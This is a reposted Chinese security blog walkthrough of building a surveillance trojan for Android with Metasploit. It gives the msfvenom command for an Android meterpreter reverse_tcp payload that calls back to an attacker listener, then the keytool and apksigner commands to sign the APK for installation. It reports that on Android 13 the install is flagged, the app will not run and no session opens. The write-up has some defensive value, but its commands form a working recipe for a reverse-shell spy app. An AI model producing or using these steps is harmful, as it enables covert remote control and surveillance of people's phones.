监控木马在android系统的实践

admin 2024年4月7日09:59:37评论10 views字数 815阅读2分43秒阅读模式

Metasploit是一款广泛使用的漏洞评估和渗透测试框架,它可以用于测试网络的安全性,识别漏洞、攻击目标等,Metasploit包含多个模块,包括扫描器、漏洞验证工具、漏洞利用工具、载荷生成器等,这些工具可以协同工作,使得渗透测试工作更加高效和准确。

监控木马在android系统的实践

metasploit下载链接

http://www.metasploit.com/download

https://github.com/rapid7/metasploit-framework

https://github.com/rapid7/metasploit-omnibus

测试背景

安卓13手机上测试了一下手机监控木马app,发现安卓13已经完全防御住了,首先app需要签名,其次app安装的时候有风险病毒提示,最后打开app的时候会显示该木马无法正常运行,实验说明监控木马在android13系统上是无效的。

生成监控木马

Msfvenom -p android/meterpreter/reverse_tcp lhost=192.168.0.102 lport=3333 R > ailx10-2024.apk

监控木马在android系统的实践

安装依赖

安装依赖,为签名做准备。

监控木马在android系统的实践

生成密钥

keytool -genkey -v -keystore cg.keystore -alias cg -keyalg RSA -keysize 2048 -validity 10000

监控木马在android系统的实践

APP签名

对app进行签名,签名之后app变大了。

apksigner sign --ks cg.keystore --ks-key-alias cg ailx10-2024.apk

监控木马在android系统的实践

app签名验证

apksigner verify -v --print-certs ailx10-2024.apk

监控木马在android系统的实践

APP安装

 监控木马在android系统的实践

监控木马在android系统的实践

APP运行

显示此应用专为旧版Android打造

监控木马在android系统的实践

测试结果

metasploit监听服务,会话建立失败,说明在安卓13手机上监控失败了

监控木马在android系统的实践

监控木马在android系统的实践

原文始发于微信公众号(编码安全):监控木马在android系统的实践

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年4月7日09:59:37
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   监控木马在android系统的实践http://cn-sec.com/archives/2634298.html

发表评论

匿名网友 填写信息